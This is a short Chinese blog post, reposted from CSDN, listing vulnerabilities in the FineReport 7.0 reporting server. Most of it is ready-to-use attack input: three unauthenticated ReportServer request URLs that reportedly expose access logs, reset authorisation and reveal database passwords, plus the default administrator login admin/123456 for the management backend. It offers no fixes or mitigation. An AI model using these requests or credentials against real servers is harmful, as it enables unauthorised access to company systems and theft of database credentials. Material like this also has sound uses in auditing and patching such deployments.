一、帆软数据决策系统漏洞背景
FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。
二、帆软数据决策系统漏洞版本查看
弱口令漏洞提供了访问此页面方法
三、帆软数据决策系统漏洞漏洞总结
1.未授权访问漏洞
http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志
http://ip/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false //未授权访问重置授权
http://ip/ReportServer?op=fr_server&cmd=sc_getconnectioninfo //未授权查看数据库密码
2.默认弱口令
访问https://ip/ReportServer,点击服务器管理平台进入后台页面
默认密码为弱口令admin/123456
标签:
安全
本文转载自: https://blog.csdn.net/yetaodiao/article/details/127021135
版权归原作者 叶涛网站推广优化 所有, 如有侵权,请联系我们删除。
版权归原作者 叶涛网站推广优化 所有, 如有侵权,请联系我们删除。